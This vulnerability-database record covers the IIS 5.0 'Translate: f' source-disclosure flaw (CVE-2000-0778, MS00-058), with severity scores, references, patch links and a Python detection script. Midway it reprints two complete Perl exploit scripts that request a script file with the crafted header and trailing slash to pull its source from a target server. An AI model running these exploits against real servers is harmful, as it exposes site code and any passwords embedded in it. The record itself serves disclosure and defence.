CVE-2000-0778
CVSS 5.0
Published: 2000-10-20 00:00:00
Last modified: 2013-08-03 00:14:09

[Original] IIS 5.0 allows remote attackers to obtain source code for .ASP files and other scripts via an HTTP GET request with a "Translate: f" header, aka the "Specialized Header" vulnerability.


[CNNVD] Microsoft IIS 5.0 "Translate: f" Header Source Code Disclosure Vulnerability (MS00-058) (CNNVD-200010-019)

        
IIS is a popular HTTP server developed by Microsoft and bundled with the Windows operating system.
IIS 5.0 contains a vulnerability in its handling of certain HTTP requests that carry a special header; a remote attacker may exploit it to obtain the source code of scripts on the server.
If IIS 5.0 receives an HTTP request containing the special header (Translate: f) and the URL ends with a special character ("/"), IIS handles the call to the script-processing engine incorrectly, which may disclose the file's source code to the remote user.
        

- CVSS (base score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:927  IIS5.0 Specialized Header Vulnerability
*OVAL describes in detail how this vulnerability is detected; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0778
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0778
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-019
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/templates/archive.pike?list=1&msg=080D5336D882D211B56B0060080F2CD696A7C9@beta.mia.cz
(VENDOR_ADVISORY)  BUGTRAQ  20000815 Translate:f summary, history and thoughts
http://www.securityfocus.com/bid/1578
(VENDOR_ADVISORY)  BID  1578
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0008&L=ntbugtraq&F=&S=&P=5212
(VENDOR_ADVISORY)  NTBUGTRAQ  20000816 Translate: f
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
(UNKNOWN)  MS  MS00-058

- Vulnerability information

Microsoft IIS 5.0 "Translate: f" Header Source Code Disclosure Vulnerability (MS00-058)
Medium  Unknown
2000-10-20 00:00:00 2005-10-12 00:00:00
Remote
        
IIS is a popular HTTP server developed by Microsoft and bundled with the Windows operating system.
IIS 5.0 contains a vulnerability in its handling of certain HTTP requests that carry a special header; a remote attacker may exploit it to obtain the source code of scripts on the server.
If IIS 5.0 receives an HTTP request containing the special header (Translate: f) and the URL ends with a special character ("/"), IIS handles the call to the script-processing engine incorrectly, which may disclose the file's source code to the remote user.
        

- Advisories and patches

Vendor patches:
Microsoft
---------
Microsoft has released a security bulletin (MS00-058) and the corresponding patch:
MS00-058: Patch Available for "Specialized Header" Vulnerability
Link:
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp

Patch download:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769

- Vulnerability information (20151)

Microsoft IIS 5.0 "Translate: f" Source Disclosure Vulnerability (1) (EDBID:20151)
windows remote
2000-08-14 Verified
0 smiler
N/A
source: http://www.securityfocus.com/bid/1578/info

Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, process them accordingly, and then execute them on the server.

It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.

#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use LWP::UserAgent;
use HTTP::Request;

if (not $ARGV[0]) {
print qq~
Geee it's running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}

$victimurl = $ARGV[0];

# Create a user agent object
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
    print $res->content;
} else {
    print $res->error_as_HTML;
}

- Vulnerability information (20152)

Microsoft IIS 5.0 "Translate: f" Source Disclosure Vulnerability (2) (EDBID:20152)
windows remote
2000-08-14 Verified
0 Roelof Temmingh
N/A
source: http://www.securityfocus.com/bid/1578/info
 
Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, process them accordingly, and then execute them on the server.
 
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.


#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
		

- Vulnerability information

390
Microsoft IIS Translate f: Request ASP Source Disclosure
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality Patch / RCS
Exploit Public Vendor Verified, Third-party Verified, Coordinated Disclosure

- Vulnerability description

Microsoft IIS contains a flaw that may allow a remote attacker to view the source code of ASP/ASA scripts. The issue is due to the server not properly handling the "Translate: f" header, used by WebDAV and FrontPage 2000. With a specially crafted header, an attacker can force the server to display script source code instead of processing the script normally. This may reveal sensitive information such as internal IP addresses, account names or passwords.
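The two descriptions above (the EDB text on the scripting engine being bypassed, and this OSVDB text noting that WebDAV and FrontPage clients send "Translate: f" legitimately) together give a defender a precise detection rule: the header alone is normal traffic, so only its combination with a script target carrying a trailing slash or backslash is worth an alert. The Python below is an added illustration for this record, not code from the advisory, the exploit authors or Microsoft. It works on raw request text as a reverse proxy or packet capture would supply it (IIS's own W3C logs do not record arbitrary request headers by default); the sample requests, the placeholder host `intranet.example` and the extension list are constructed for the example.

```python
"""Flag HTTP requests that match the IIS 5.0 "Translate: f" source-disclosure
pattern (CVE-2000-0778 / MS00-058).

Added example for this record; not code from the advisory, the exploit authors
or Microsoft. Input is raw request text as a proxy or packet capture would hand
it over; every sample request below is constructed."""

from dataclasses import dataclass
from urllib.parse import unquote

# Extensions the record says IIS 5.0 routes to a scripting engine
# (assumed list for the example; extend it to match the server's script maps).
SCRIPT_EXTENSIONS = (".asp", ".asa", ".htr")


@dataclass
class Verdict:
    suspicious: bool
    reason: str


def parse_request(raw: str):
    """Split a raw HTTP/1.x request head into (method, target, headers).

    Header names are lower-cased and values stripped, so 'Translate: f' and
    'translate:F' land in the same place. The body after the blank line is
    ignored: the pattern lives entirely in the request line and headers."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line: %r" % lines[0])
    method, target = parts[0].upper(), parts[1]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw: str) -> Verdict:
    """Report whether one request shows the disclosure pattern.

    Both conditions from the record must hold: a Translate: f header AND a
    script target with a trailing slash or backslash. Translate: f alone is
    normal WebDAV / FrontPage traffic and is deliberately not reported."""
    method, target, headers = parse_request(raw)
    if headers.get("translate", "").lower() != "f":
        return Verdict(False, "no Translate: f header")
    # Drop the query string and percent-decode so the path is compared in its
    # decoded form, the same form the server acts on.
    path = unquote(target.split("?", 1)[0])
    stripped = path.rstrip("\\/")
    if stripped == path:
        return Verdict(False, "Translate: f without trailing slash (ordinary WebDAV/FrontPage use)")
    if not stripped.lower().endswith(SCRIPT_EXTENSIONS):
        return Verdict(False, "trailing slash but target is not a script file")
    return Verdict(True, "%s for script %r with trailing slash and Translate: f" % (method, stripped))


def scan(requests: dict) -> list:
    """Return the labels of the requests that match, in input order."""
    return [label for label, raw in requests.items() if classify(raw).suspicious]


# Constructed sample traffic; intranet.example is a placeholder host.
SAMPLES = {
    "script_with_trailing_backslash": (
        "GET /global.asa\\ HTTP/1.0\r\nHost: intranet.example\r\n"
        "Translate: f\r\n\r\n"),
    "script_with_trailing_slash": (
        "GET /default.asp/ HTTP/1.0\r\nHost: intranet.example\r\n"
        "translate: F\r\n\r\n"),
    "webdav_client_normal_path": (
        "GET /docs/report.doc HTTP/1.1\r\nHost: intranet.example\r\n"
        "Translate: f\r\n\r\n"),
    "plain_browser_request": (
        "GET /default.asp HTTP/1.1\r\nHost: intranet.example\r\n"
        "User-Agent: Mozilla/4.0\r\n\r\n"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        verdict = classify(raw)
        print("%-32s %s  %s" % (label, "ALERT" if verdict.suspicious else "ok   ", verdict.reason))
```

Running the script prints one line per sample; only the two script requests with a trailing separator are reported, the WebDAV-style request on an ordinary path and the plain browser request are not. On a patched server (MS00-058 applied) a hit still indicates a scanner or a probing client, which is worth recording even though the disclosure itself no longer occurs.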

- Timeline

2000-08-15 Unknown
2000-08-16 2000-08-14

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (MS00-058) to address this vulnerability.

- References

- Vulnerability author

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites.